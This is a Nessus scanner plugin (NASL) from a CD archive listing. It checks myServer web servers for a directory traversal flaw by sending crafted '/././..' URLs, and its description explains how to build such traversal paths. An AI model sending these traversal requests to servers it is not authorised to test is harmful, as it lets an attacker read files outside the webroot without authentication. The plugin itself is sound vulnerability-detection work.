home *** CD-ROM | disk | FTP | other *** search
/ Chip 2007 January, February, March & April / Chip-Cover-CD-2007-02.iso / Pakiet bezpieczenstwa / mini Pentoo LiveCD 2006.1 / mpentoo-2006.1.iso / modules / nessus-2.2.8.mo / usr / lib / nessus / plugins / myserver_traversal.nasl < prev    next >
Text File  |  2005-03-31  |  3KB  |  86 lines

  1. #
  2. # This script was written by Paul Johnston of Westpoint Ltd <paul@westpoint.ltd.uk>
  3. #
  4. # See the Nessus Scripts License for details
  5. #
  6. # References:
  7. #
  8. # From:    "Securiteinfo.com" <webmaster@securiteinfo.com>
  9. # To:    bugtraq@securityfocus.com
  10. # Date:    Wed, 15 Sep 2004 17:42:48 +0200
  11. # CC:    admin@succurit.com, bugs@securitytracker.com, contact@isecurelabs.com,
  12. #  dis@phreak.org, news@securiteam.com, snpMarq@yahoo.com, 
  13. #  submissions@packetstormsecurity.org, ts@securityoffice.net, 
  14. #  vuln@security-corporation.com, vulnwatch@vulnwatch.org
  15. # Message-Id:    <200409151742.48914.webmaster@securiteinfo.com>
  16. # Subject:    myServer 0.7 Directory Traversal Vulnerability
  17.  
  18. if(description)
  19. {
  20.  script_id(11851);
  21.  script_version ("$Revision: 1.3 $");
  22.  
  23.  name["english"] = "myServer 0.4.3 / 0.7 Directory Traversal Vulnerability";
  24.  script_name(english:name["english"]);
  25.  
  26.  desc["english"] = "
  27. This web server is running myServer <= 0.4.3 or 0.7. This version contains
  28. a directory traversal vulnerability, that allows remote users with
  29. no authentication to read files outside the webroot.
  30.  
  31. You have to create a dot-dot URL with the same number of '/./' and '/../'
  32. + 1. For example, you can use :
  33. /././..
  34. /./././../..
  35. /././././../../..
  36. /./././././../../../..
  37. etc...
  38. or a long URL starting with ./././. etc.
  39.  
  40. More information : http://www.securityfocus.com/archive/1/339145
  41.  
  42. Solution : Upgrade to myServer 0.7.1 or later
  43. Risk factor : High";
  44.  
  45.  
  46.  script_description(english:desc["english"]);
  47.  
  48.  summary["english"] = "Attempts to retrieve the path '/././..'";
  49.  script_summary(english:summary["english"]);
  50.  
  51.  script_category(ACT_ATTACK);
  52.  script_copyright(english:"Author Paul Johnston paul@westpoint.ltd.uk, Copyright (C) 2003 Westpoint Ltd");
  53.  script_family(english:"CGI abuses");
  54.  
  55.  script_dependencie("find_service.nes", "http_version.nasl");
  56.  script_require_ports("Services/www", 80);
  57.  
  58.  exit(0);
  59. }
  60.  
  61. include("http_func.inc");
  62. include("http_keepalive.inc");
  63.  
  64. port = get_http_port(default:80);
  65.  
  66. if(!get_port_state(port))exit(0);
  67.  
  68. # In fact, myServer 0.7 is also vulnerable to the first URL.
  69. # However, as the bug was supposed to be fixed in 0.4.3 and reappeared in 
  70. # 0.7, I think that checking every avatar is safer.
  71.  
  72. foreach pattern (make_list("/././..", "././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././../../../../../../../../"))
  73. {
  74.  req = http_get(item: pattern, port:port);
  75.  res = http_keepalive_send_recv(port:port, data:req);
  76.  if(res == NULL) exit(0);
  77.  
  78.  if(ereg(pattern:"^HTTP/[0-9]\.[0-9] 200 ", string:res)
  79.     && egrep(pattern:"Contents of folder \.\.", string:res, icase:1))
  80.  {
  81.   security_hole(port);
  82.   exit(0);
  83.  }
  84. }
  85.